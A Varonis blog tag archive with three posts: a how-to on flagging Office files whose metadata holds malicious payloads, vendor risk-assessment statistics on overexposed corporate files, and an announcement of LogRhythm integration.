Tag Archives: DatAdvantage

Detecting Malware Payloads in Office Document Metadata

Office Documents with Malicious Metadata

Ever consider document properties like “Company,” “Title,” and “Comments” a vehicle for a malicious payload? Checkout this nifty PowerShell payload in the company metadata:

Here’s the full VirusTotal entry. The target opens the Office document and, with macros enabled, the payload stored within the document’s own metadata executes and does its work. No extra files written to disk or network requests made.

The question  about whether DatAlert can detect stuff like this came up in the Twitter thread, so I decided to write up a quick how-to.

Finding Malicious Metadata with Varonis

What you’ll need: DatAdvantage, Data Classification Framework, DatAlert

Step 1: Add Extended File Properties to be scanned by Data Classification Framework.

  • Open up the Varonis Management Console
  • Click on Configuration → Extended File properties
  • Add a new property for whichever field you’d like to scan (e.g., “Company”)

Varonis Management Console

(Note: prior to version 6.3, extended properties are created in DatAdvantage under Tools → DCF and DW → Configuration → Advanced)

Step 2: Define a malicious metadata classification rule

  • In the main menu of DatAdvantage select Tools → DCF and DW → Configuration
  • Create a new rule
  • Create a new filter
  • Select File properties → Company (or whichever property you’re scanning)
  • Select “like” to search for a substring
  • Add the malicious value you’d like to look for (e.g., .exe or .bat)

Varonis DCF New Classification Rule

Step 3: Create an alert in DatAlert to notify you whenever a file with malicious metadata is discovered

  • In the main menu of DatAdvantage select Tools → DatAlert
  • Click the green “+” button to create a new rule
  • Click on the “Where (Affected Object)” sub menu on the left
  • Add a new filter → Classification Results
  • Select your rule name (e.g., “Malicious Metadata”)
  • Select “Files with hits” and “Hit count (on selected rules)” greater than 0

DatAlert Rule for Malicious Document Metadata

You can fill out the rest of the details of your alert rule–like which systems to scan, how you want to get your alerts, etc.

As an extra precaution, you could also create a Data Transport Engine rule based on the same classification result that will automatically quarantine files that are found to have malicious metadata.

That’s it! You can update your “Malicious Metadata” over time as you see reports from malware researchers of new and stealthier ways to encode malicious bits within document metadata.

If you’re an existing Varonis customer, you can setup office hours with your assigned engineer to review your classification rules and alerts. Not yet a Varonis customer? What are you waiting for? Get a demo of our data security platform today.

Here’s Why Most Companies Are Easy Prey for Cyberattackers

Here’s Why Most Companies Are Easy Prey for Cyberattackers

Today we announced the results of anonymous data that our DatAdvantage and Data Classification Framework solutions collected throughout 2015 during risk assessments conducted for potential customers on a limited subset of their file systems. The results show a staggering level of exposure in corporate file systems, including an average of 9.9 million files per assessment that were accessible by every employee in the company.

Varonis DatAdvantage provides full visibility into who can and does access file systems and unstructured data. Varonis Data Classification Framework identifies sensitive and regulated content, like credit card numbers and health records, and maps them to exposures in their host file systems. Even while assessment and remediation projects are in progress, Varonis DatAlert can detect and stop insider threats, unwanted privilege escalations and abuse, and ransomware like Cryptolocker.

Of the insights gleaned from dozens of customer risk assessments conducted in mid-to-large enterprises prior to remediation, Varonis found the average company had, in a subset of its file systems:

averages2

  • 35.3 million files, stored in 4 million folders
  • 1 million folders, or an average of 28% of all folders, with “everyone” group permission enabled –open to all network users
  • 9 million files that were accessible by every employee in the company regardless of their roles
  • 8 million folders, or 70% of all folders, contained stale data — untouched for the past six months
  • 25,000 user accounts, with 7,700 of them or 31% “stale” – having not logged in for the past 60 days, suggesting former employees, or consultants and contractors whose engagements have ended

The ‘everyone’ group is a common convenience for permissions when originally set up. That mass access also makes it astonishingly easy for hackers to steal company data.

Some individual companies’ lowlights that were gleaned from the Varonis risk assessments:

  • In one company, every employee had access to 82% of the 6.1 million total folders.

  • Another company had more than 2 million files containing sensitive data (credit card, social security or account numbers) that everyone in the company could access.

  • 50% of another company’s folders had “everyone” group permission, and more than 14,000 files in those folders were found to contain sensitive data.

  • A single company had more than 146,000 stale users – accounts whose users had not logged in for the past 60 days. That’s nearly three times more users than the average FORTUNE 500 company has employees.

Although this data presents a bleak look at the average enterprise’s corporate file system environment, the organizations running these risk assessments are taking these challenges seriously. Most of them have since implemented Varonis, embracing a more holistic view of the data on their file and email systems and closing these gaping, often unseen security holes before the next major breach causes heavy damage. Our software is able to provide a granular look at where sensitive data lives, where it is over-exposed within an organization, who is accessing that data, and how to lock it down. While that remediation process is running, our ability to detect and stop many types of insider threats has been a major revelation for our customers.

***

Our Risk Assessments quickly show you where your most vulnerable data is stored, who is accessing it, and what needs to be done to secure it.

Request a Risk Assessment from the Varonis Professional Services Team visit: https://info.varonis.com/assessment

 

Varonis DatAdvantage and DatAlert Are Now Interoperable with LogRhythm’s ...

Varonis DatAdvantage and DatAlert Are Now Interoperable with LogRhythm’s Security Intelligence Platform

Today we’re happy to announce the interoperability of our DatAdvantage and DatAlert solutions with the LogRhythm Security Intelligence Platform.

With the new interoperability, customers can combine critical security insight from LogRhythm with Varonis intelligence about file systems and unstructured data – the type of data they typically have the most of and know the least about. Varonis and LogRhythm can help organizations proactively spot signs insider threats before they end up in the news because of a data breach.

How does it work?

Varonis can automatically send alerts from Varonis DatAdvantage and DatAlert into LogRhythm Security Intelligence Platform and thereby increase the speed and accuracy with which customers are able to identify, prioritize and investigate unusual user behavior surrounding unstructured data. Anomalous activity spotted by Varonis analytics includes unusual access to sensitive and stale data, mass deletions and modifications, malware and ransomware infections like CryptoLocker and Cryptowall, privilege escalations, unusual access to PII, multiple failed login attempts, and many more potential warning signs. Installation of Varonis DatAdvantage and DatAlert can take as little as an hour, and integration with LogRhythm is as simple as configuring an IP address.

Click here to learn more.